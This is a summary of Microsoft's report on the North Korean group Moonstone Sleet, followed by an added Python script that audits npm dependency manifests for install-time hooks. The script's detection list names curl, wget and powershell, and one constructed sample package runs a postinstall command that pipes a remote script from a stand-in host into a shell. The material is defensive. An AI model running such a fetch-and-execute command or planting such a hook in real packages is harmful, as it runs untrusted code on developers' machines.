Microsoft Uncovers ‘Moonstone Sleet’ — New North Korean Hacker Group

May 29, 2024 at 07:00AM

A new North Korean threat actor, Moonstone Sleet, has been linked to cyber attacks that target various sectors with ransomware and bespoke malware previously associated with the infamous Lazarus Group. Moonstone Sleet combines established and unique techniques to achieve its objectives, posing a significant threat. The disclosure warns of supply chain attacks and urges vigilance.

The key takeaways from the article are:

1. A new North Korean threat actor called Moonstone Sleet has been identified as behind cyber attacks targeting various sectors including software and information technology, education, and defense industrial base with ransomware and bespoke malware.

2. Moonstone Sleet is observed to employ various tactics such as setting up fake companies and job opportunities, distributing trojanized versions of legitimate tools, creating malicious games, and delivering custom ransomware.

3. The threat actor has exhibited similarities with the Lazarus Group and has been tracked by Microsoft under the names Storm-1789 and Storm-1877, adopting both tried-and-true techniques used by other North Korean threat actors and unique attack methodologies.

4. Various attack chains and sequences have been observed, including the use of modified versions of PuTTY, malicious npm packages, and a malicious tank game called DeTankWar for malware delivery.

5. Moonstone Sleet has used multiple approaches to engage targets, including messaging platforms, emails, and social engineering campaigns using fake companies and websites.

6. The threat actor has also been linked to the deployment of a custom ransomware variant called FakePenny against a defense technology company, demanding a $6.6 million ransom in Bitcoin.

7. Redmond is urging software companies to be vigilant for supply chain attacks, given North Korean threat actors’ propensity for poisoning the software supply chain to conduct widespread malicious operations.

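Takeaways 4 and 7 above single out malicious npm packages and software supply chain poisoning. One concrete check a development team can run is an audit of dependency manifests for install-time lifecycle scripts, since npm executes `preinstall`, `install`, `postinstall` and `prepare` hooks automatically during `npm install`. The script below is an added example written for this summary, not code from Microsoft or from the article; the package names and commands in `SAMPLE_PACKAGES` are constructed for illustration and do not correspond to any package mentioned in the report.

```python
import json
from pathlib import Path

# Lifecycle hooks that npm runs automatically during "npm install".
# A dependency that declares one runs code on the developer's machine
# before any application code is reviewed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic markers for commands that fetch or execute remote content or
# run an interpreter on an inline payload. A hit means "review", not proof.
SUSPICIOUS_MARKERS = ("curl ", "wget ", "http://", "https://",
                      "node -e", "powershell", "base64")


def load_node_modules(root):
    """Read every node_modules/*/package.json under `root` into a dict
    keyed by package name (assumed layout: one directory per package)."""
    packages = {}
    for manifest_path in Path(root).glob("node_modules/*/package.json"):
        with open(manifest_path, encoding="utf-8") as fh:
            manifest = json.load(fh)
        packages[manifest.get("name", manifest_path.parent.name)] = manifest
    return packages


def find_install_hooks(packages):
    """Return (package_name, hook, command) for every manifest that
    declares an install-time lifecycle script."""
    findings = []
    for name, manifest in packages.items():
        scripts = manifest.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                findings.append((name, hook, scripts[hook]))
    return findings


def suspicious_commands(findings):
    """Narrow the hook list to commands matching SUSPICIOUS_MARKERS."""
    return [f for f in findings
            if any(marker in f[2] for marker in SUSPICIOUS_MARKERS)]


# Constructed sample manifests (not real packages): a plain library,
# a native add-on with a legitimate build step, and a dependency that
# pulls and executes a remote script at install time.
SAMPLE_PACKAGES = {
    "plain-lib": {"name": "plain-lib", "version": "1.0.0"},
    "native-addon": {"name": "native-addon", "version": "2.1.0",
                     "scripts": {"install": "node-gyp rebuild"}},
    "helper-utils": {"name": "helper-utils", "version": "0.3.7",
                     "scripts": {"postinstall":
                                 "curl -s https://example.invalid/s.sh | sh"}},
}


def audit(packages=SAMPLE_PACKAGES):
    """Return (all_install_hooks, flagged_hooks) for a set of manifests."""
    hooks = find_install_hooks(packages)
    return hooks, suspicious_commands(hooks)


if __name__ == "__main__":
    all_hooks, flagged = audit()
    for entry in all_hooks:
        tag = "REVIEW" if entry in flagged else "info"
        print(f"[{tag}] {entry[0]}: {entry[1]} -> {entry[2]}")
```

To run it against a real project tree, call `audit(load_node_modules("path/to/project"))`. Every install hook deserves a look, not only the flagged ones: `node-gyp rebuild` is normal for a native add-on, but an unexpected hook in a package that has no reason to compile anything is exactly the kind of signal this check exists to surface. Installing with `npm install --ignore-scripts` and then enabling scripts only for reviewed packages removes the automatic execution path entirely.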
These takeaways give an overview of the activities and tactics employed by the Moonstone Sleet threat actor, as well as the response and security measures recommended by Microsoft.